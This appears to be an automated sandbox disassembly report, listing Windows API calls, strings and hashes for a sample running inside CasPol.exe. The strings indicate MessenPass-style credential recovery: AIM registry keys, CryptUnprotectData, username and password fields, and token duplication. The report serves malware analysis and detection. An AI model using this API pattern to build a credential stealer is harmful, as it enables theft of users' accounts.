                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e67f2f42cdfcc6d6620761b8a7d89372e721f023a66968946340eb0cc98dc02
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4211E93164025879E7212717EC4AFCB3E6C9F85B59F14407FBA49BA0C1CABD99C086BC
                                                                                                                                                                                    Function 0041102B Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0041115C,00404495,00000000,00000000,00000000), ref: 0041103A
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,?), ref: 00411053
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00411064
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00411075
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00411086
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 00411097
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                                    • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                    • API String ID: 667068680-3953557276
                                                                                                                                                                                    • Opcode ID: 2211e89b0737fecda3037a560225c9ed33993fa6787b657681e5e05db23e2a88
                                                                                                                                                                                    • Instruction ID: 36442a69f5807846e20e8f789375593bd69b00a93b3bf86530e8c97bdb066b37
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2211e89b0737fecda3037a560225c9ed33993fa6787b657681e5e05db23e2a88
                                                                                                                                                                                    • Instruction Fuzzy Hash: 46F01D39E00362DD97209B26BD40BE73EE5578DB80715803BE908D2264DBB894C38FAD
                                                                                                                                                                                    Function 00405C4E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 115libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetRect.USER32(?,00000001,00000001,00000001,00000001), ref: 00405C6D
                                                                                                                                                                                    • MapDialogRect.USER32(?,?), ref: 00405C7D
                                                                                                                                                                                    • memset.MSVCRT ref: 00405D4B
                                                                                                                                                                                    • sprintf.MSVCRT ref: 00405D6E
                                                                                                                                                                                    • SetWindowTextA.USER32(?,?), ref: 00405D83
                                                                                                                                                                                    • LoadLibraryA.KERNEL32(shlwapi.dll), ref: 00405D90
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 00405D9E
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00405DB1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LibraryRect$AddressDialogFreeLoadProcTextWindowmemsetsprintf
                                                                                                                                                                                    • String ID: %s:$SHAutoComplete$shlwapi.dll
                                                                                                                                                                                    • API String ID: 2601263068-2802052640
                                                                                                                                                                                    • Opcode ID: ab2cf4164b993b72bb3261ad71969f56e00e3f563b2705c4529dda320590d4ba
                                                                                                                                                                                    • Instruction ID: b550a958d3f196041ff417ee8ca2f57d98087dd1caa8e181cbf0d69f42a088e7
                                                                                                                                                                                    • Opcode Fuzzy Hash: ab2cf4164b993b72bb3261ad71969f56e00e3f563b2705c4529dda320590d4ba
                                                                                                                                                                                    • Instruction Fuzzy Hash: D0410B71A00209EFDB11DF94DC496EEBBB8EF48309F10846AE905B7251D7789A858F54
                                                                                                                                                                                    Function 004088D4 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowstringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Menu$Itemmemset$CountInfoModify_mbscatstrchr
                                                                                                                                                                                    • String ID: 0$6
                                                                                                                                                                                    • API String ID: 3540791495-3849865405
                                                                                                                                                                                    • Opcode ID: 279e0e3116dd7a36083eff5afaa6bfe1abce752894615ec7df7e32fa7ef46b8e
                                                                                                                                                                                    • Instruction ID: a8fe6fb1212bd118e16e367106d6d34f7a286138b6ca25e595fdc587e8241262
                                                                                                                                                                                    • Opcode Fuzzy Hash: 279e0e3116dd7a36083eff5afaa6bfe1abce752894615ec7df7e32fa7ef46b8e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C31BFB2408380AFC7209F55D941AABBBE8EB84314F04483FF588A2251D778D984CF5A
                                                                                                                                                                                    Function 004134D0 Relevance: 13.6, APIs: 9, Instructions: 61windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetParent.USER32(00000000), ref: 004134D2
                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000EC), ref: 004134E4
                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 004134EF
                                                                                                                                                                                    • GetClassNameA.USER32(00000000,?,000003FF), ref: 00413505
                                                                                                                                                                                    • GetWindowTextA.USER32(00000000,?,000003FF), ref: 00413511
                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0041351F
                                                                                                                                                                                    • CopyRect.USER32(?,?), ref: 00413533
                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 00413541
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000031,00000000,00000000), ref: 0041359A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$LongRect$ClassCopyMessageNameParentPointsSendText
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2317770421-0
                                                                                                                                                                                    • Opcode ID: 7af2e41bf762aae8540d43ee514e8ccf414c9672fa24b186be0172eacc68f4a9
                                                                                                                                                                                    • Instruction ID: beb27d93b7d0259d1707648e93b0cb5b486bd7e44cd55be4178ee0c76b875b45
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7af2e41bf762aae8540d43ee514e8ccf414c9672fa24b186be0172eacc68f4a9
                                                                                                                                                                                    • Instruction Fuzzy Hash: BF21A6B5500B01EFD7609F75DC88AD7BBEDFB88700F00CA2DA5AAD2254DA306541CFA4
                                                                                                                                                                                    Function 0041244B Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040A4AC,?,?), ref: 0041247B
                                                                                                                                                                                    • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040A4AC,?,?), ref: 004124A1
                                                                                                                                                                                    • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040A4AC,?,?), ref: 004124B9
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                    • API String ID: 3510742995-3273207271
                                                                                                                                                                                    • Opcode ID: 13415ff2963e6dace8cd86106c59db4403270bd4b6c64038e468014c2b1c2be9
                                                                                                                                                                                    • Instruction ID: f5a03e54b86e24f841f817b97e8ec33e4e13f45a83786b80a5cfcbc9bb1d817d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 13415ff2963e6dace8cd86106c59db4403270bd4b6c64038e468014c2b1c2be9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0401DFB2EC465475EB3201093E4AFE72A4447B7B21F660667F589A0285E0DD0EF381BF
                                                                                                                                                                                    Function 004044DE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 59libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00410DAA: GetProcAddress.KERNEL32(00000000,OpenProcessToken,00000000,00000000,004044F8,000000FF,0000000E,?,?,0040428D), ref: 00410DC0
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,000000FF,0000000E,?,?,0040428D), ref: 0040456E
                                                                                                                                                                                      • Part of subcall function 00410D8A: LoadLibraryA.KERNEL32(advapi32.dll), ref: 00410D94
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,DuplicateToken,00000000,00000000,000000A0,000000FF,0000000E,?,?,0040428D), ref: 0040451C
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetThreadToken), ref: 00404543
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00404553
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040455D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$CloseHandleLibrary$FreeLoad
                                                                                                                                                                                    • String ID: DuplicateToken$SetThreadToken
                                                                                                                                                                                    • API String ID: 3357505703-785560009
                                                                                                                                                                                    • Opcode ID: ead61f231025bced0a09c2f1fb3dd8adab68ce1b78bee45ece79c7bb5241faa8
                                                                                                                                                                                    • Instruction ID: fb771c117c903999f7ab115302b4b85a9bfa7a6589c8aae05a31450a7ce75296
                                                                                                                                                                                    • Opcode Fuzzy Hash: ead61f231025bced0a09c2f1fb3dd8adab68ce1b78bee45ece79c7bb5241faa8
                                                                                                                                                                                    • Instruction Fuzzy Hash: D4113071900109FBDB10E7A5DD55EEE7B78AF84340F144176A611B10E1EB74DF44DA68
                                                                                                                                                                                    Function 00405865 Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 202stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$strlen
                                                                                                                                                                                    • String ID: '$'$S'password'$S'username'
                                                                                                                                                                                    • API String ID: 3337090206-859024053
                                                                                                                                                                                    • Opcode ID: e1cab7f00341b9ec69ea1fd77629a3ef37b3dcc5a417ad93794562d5d2f9417f
                                                                                                                                                                                    • Instruction ID: 095c589e2a809376e97825867b0f887a5e853f6b8f709b3ead32f3d6acc6b9c2
                                                                                                                                                                                    • Opcode Fuzzy Hash: e1cab7f00341b9ec69ea1fd77629a3ef37b3dcc5a417ad93794562d5d2f9417f
                                                                                                                                                                                    • Instruction Fuzzy Hash: A5716071D0065DAECF21DB94C881BEFBBB4EF1A314F5041ABD444B7282D6385A8A8F59
                                                                                                                                                                                    Function 0040AC28 Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040AC75
                                                                                                                                                                                    • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040ACAA
                                                                                                                                                                                    • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040ACDF
                                                                                                                                                                                    • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040ACFB
                                                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 0040AD0B
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040AD3F
                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0040AD42
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040AD60
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3642520215-0
                                                                                                                                                                                    • Opcode ID: 89608fa394cce56546426f1758b6b0ed6a96b027106975741db31758971510ff
                                                                                                                                                                                    • Instruction ID: 10adafa9a034a25fdfd439dfbbefb27d9cbe3ef8874ff0eb0b967345faf6b271
                                                                                                                                                                                    • Opcode Fuzzy Hash: 89608fa394cce56546426f1758b6b0ed6a96b027106975741db31758971510ff
                                                                                                                                                                                    • Instruction Fuzzy Hash: B8316171680708BFFA316B60DC47FD67695EB88B00F104829F3857A1E1CAF278909B58
                                                                                                                                                                                    Function 00407034 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 59stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00407055
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040707E
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040708A
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,?), ref: 0040709F
                                                                                                                                                                                    • strlen.MSVCRT ref: 004070AD
                                                                                                                                                                                    • memcpy.MSVCRT(00000001,?,00000001,?,00000000,00000000,00000001,00000000,00000000,%s (%s),?,?), ref: 004070BD
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpystrlen$memsetsprintf
                                                                                                                                                                                    • String ID: %s (%s)
                                                                                                                                                                                    • API String ID: 3756086014-1363028141
                                                                                                                                                                                    • Opcode ID: 936799879657ece0d987efaaa21eb692f92e76d5c857caaa6a1a5a279cf2af51
                                                                                                                                                                                    • Instruction ID: a198fb7af375a94c8e27cd288863d28c10177bb58caa4549e63a683f86c2f09a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 936799879657ece0d987efaaa21eb692f92e76d5c857caaa6a1a5a279cf2af51
                                                                                                                                                                                    • Instruction Fuzzy Hash: 93114FB2800158BBDB21DF69DC45BDABBBCEF01309F0005AAE644B7101D775AB55CBA5
                                                                                                                                                                                    Function 0040807D Relevance: 9.1, APIs: 6, Instructions: 98stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 00408094
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004,?,?,00000004), ref: 004080A3
                                                                                                                                                                                      • Part of subcall function 0040C929: memcpy.MSVCRT(?,?,00000008,00000000,?,?,?,004080BF,?,?,?,00000004,?,?,00000004), ref: 0040C9BA
                                                                                                                                                                                      • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9E6
                                                                                                                                                                                      • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9FC
                                                                                                                                                                                      • Part of subcall function 0040C9C7: memcpy.MSVCRT(?,?,00000010,00000004), ref: 0040CA33
                                                                                                                                                                                      • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040CA3D
                                                                                                                                                                                    • memset.MSVCRT ref: 00408120
                                                                                                                                                                                    • strlen.MSVCRT ref: 00408160
                                                                                                                                                                                    • _mbscpy.MSVCRT(00000000,?), ref: 0040817F
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,00000000,?), ref: 0040818C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpymemset$_mbscpy$strlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2712745786-0
                                                                                                                                                                                    • Opcode ID: 50e45666a0393e5ef850d505c3c738091cb5fcbebc819cab067422742a707744
                                                                                                                                                                                    • Instruction ID: bdbe0c05a74f47d21f032104af17620136749afb05b7a30319e2a8bb584ff9b0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 50e45666a0393e5ef850d505c3c738091cb5fcbebc819cab067422742a707744
                                                                                                                                                                                    • Instruction Fuzzy Hash: AC3194728001099ACF14EF65DC85BDE77BCAF44304F00446FE549E7181EB74A68A8BA5
                                                                                                                                                                                    Function 0040B8FA Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 70COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040B91A
                                                                                                                                                                                      • Part of subcall function 0040876F: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408838
                                                                                                                                                                                      • Part of subcall function 0040876F: memcpy.MSVCRT(00000000,00000001), ref: 00408877
                                                                                                                                                                                      • Part of subcall function 0040876F: _mbscpy.MSVCRT(0041E308,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403FEE,MessenPass), ref: 004087EA
                                                                                                                                                                                      • Part of subcall function 0040876F: strlen.MSVCRT ref: 00408808
                                                                                                                                                                                      • Part of subcall function 00407034: memset.MSVCRT ref: 00407055
                                                                                                                                                                                      • Part of subcall function 00407034: sprintf.MSVCRT ref: 0040707E
                                                                                                                                                                                      • Part of subcall function 00407034: strlen.MSVCRT ref: 0040708A
                                                                                                                                                                                      • Part of subcall function 00407034: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,?), ref: 0040709F
                                                                                                                                                                                      • Part of subcall function 00407034: strlen.MSVCRT ref: 004070AD
                                                                                                                                                                                      • Part of subcall function 00407034: memcpy.MSVCRT(00000001,?,00000001,?,00000000,00000000,00000001,00000000,00000000,%s (%s),?,?), ref: 004070BD
                                                                                                                                                                                      • Part of subcall function 00406E60: _mbscpy.MSVCRT(?,?), ref: 00406EC6
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                                                                                                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                    • API String ID: 2726666094-3614832568
                                                                                                                                                                                    • Opcode ID: 48ad67bf17a677834281717159f6163cc093dbae317e4fe0e66c085f04f9eb92
                                                                                                                                                                                    • Instruction ID: 663635aaa2767a47ae833ce325b1c2bbb94a135e02c7cec880bc1d98f4d47d81
                                                                                                                                                                                    • Opcode Fuzzy Hash: 48ad67bf17a677834281717159f6163cc093dbae317e4fe0e66c085f04f9eb92
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E21EBB5C002189FCB01FFA5DA817DDBBB4AB08708F20417FE549B7286DF381A558B99
                                                                                                                                                                                    Function 00408C31 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00408C55
                                                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(0041E308,0000000A,00417C88,?,00001000,0041E200), ref: 00408C77
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 00408C91
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00408C3E
                                                                                                                                                                                    • ?@, xrefs: 00408C31
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfileString_mbscpymemset
                                                                                                                                                                                    • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$?@
                                                                                                                                                                                    • API String ID: 408644273-2377969721
                                                                                                                                                                                    • Opcode ID: eaa32ef34ef00f9ac7c7a4cfa2a550b3bebd30948c3fa105c0e2286ae863700b
                                                                                                                                                                                    • Instruction ID: 2fc49bb05c8bae64ff8dc8c223d61166255d3b04a08aec8dce2eb6f2e2500c43
                                                                                                                                                                                    • Opcode Fuzzy Hash: eaa32ef34ef00f9ac7c7a4cfa2a550b3bebd30948c3fa105c0e2286ae863700b
                                                                                                                                                                                    • Instruction Fuzzy Hash: BCF0E0725451587AEB139B54EC05FCA7BBC9B4C706F1040E6B749F6080D5F89AC087AC
                                                                                                                                                                                    Function 00406830 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLastMessagesprintf
                                                                                                                                                                                    • String ID: Error$Error %d: %s
                                                                                                                                                                                    • API String ID: 1670431679-1552265934
                                                                                                                                                                                    • Opcode ID: 36d162438dc91d31452d3ddaed1ce93054fc777c1344ba0c13efd454db99335c
                                                                                                                                                                                    • Instruction ID: 390cea375f2136b4ea19b9d86a6fd2b83de258ebf73c3752b6ef921ad7f75954
                                                                                                                                                                                    • Opcode Fuzzy Hash: 36d162438dc91d31452d3ddaed1ce93054fc777c1344ba0c13efd454db99335c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5CF0ECB780020877CB11A754CC05FD676BCBB84704F1540BAB905F2140FF74DA458FA8
                                                                                                                                                                                    Function 004108FA Relevance: 7.6, APIs: 6, Instructions: 141COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00404C9D: LoadLibraryA.KERNEL32(crypt32.dll), ref: 00404CAA
                                                                                                                                                                                      • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData,?,?), ref: 00404CBC
                                                                                                                                                                                    • memset.MSVCRT ref: 00410939
                                                                                                                                                                                    • memset.MSVCRT ref: 0041097A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$AddressLibraryLoadProc
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 95357979-0
                                                                                                                                                                                    • Opcode ID: 3302643975eb3434f4358ab3f025d73aba831524dacbebe51815e8c7a7d14f38
                                                                                                                                                                                    • Instruction ID: c4421e9d11457ef95cabe1857e087483fdaed0180908bfd30e84e21e9d597d19
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3302643975eb3434f4358ab3f025d73aba831524dacbebe51815e8c7a7d14f38
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F5139B1C1021DAADF10DF95CD819EEB7BCBF18348F4001AAE605B2251E7789B84CB64
                                                                                                                                                                                    Function 0040A455 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
                                                                                                                                                                                      • Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406806
                                                                                                                                                                                    • memset.MSVCRT ref: 0040A48B
                                                                                                                                                                                      • Part of subcall function 0041244B: memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040A4AC,?,?), ref: 004124B9
                                                                                                                                                                                      • Part of subcall function 00409DD6: _mbscpy.MSVCRT(00000000,?,0040A4C1,?,?,?), ref: 00409DDB
                                                                                                                                                                                      • Part of subcall function 00409DD6: _strlwr.MSVCRT ref: 00409E1E
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040A4D0
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                                                                                                                                                                    • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                    • API String ID: 3337535707-2769808009
                                                                                                                                                                                    • Opcode ID: 3c2db06bff03dcf5fd4fdc9aafb8c3b6a106532d81ea05e082948edd07be60db
                                                                                                                                                                                    • Instruction ID: 35c3a08c9f4b1e8506f5bd30b0a1229d9af700aff423b6f7980a7f41b92f6d4d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3c2db06bff03dcf5fd4fdc9aafb8c3b6a106532d81ea05e082948edd07be60db
                                                                                                                                                                                    • Instruction Fuzzy Hash: E811E731500616BFD711AF15CC42E9ABB68FF0831CF10402AF409665A1EB76B974CB88
                                                                                                                                                                                    Function 00402834 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00411D68: RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                                                                                                                                                                    • memset.MSVCRT ref: 00402873
                                                                                                                                                                                      • Part of subcall function 00411DEE: RegEnumKeyExA.KERNEL32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004028C2
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004028DF
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Close$EnumOpenmemset
                                                                                                                                                                                    • String ID: Software\AIM\AIMPRO
                                                                                                                                                                                    • API String ID: 2255314230-3527110354
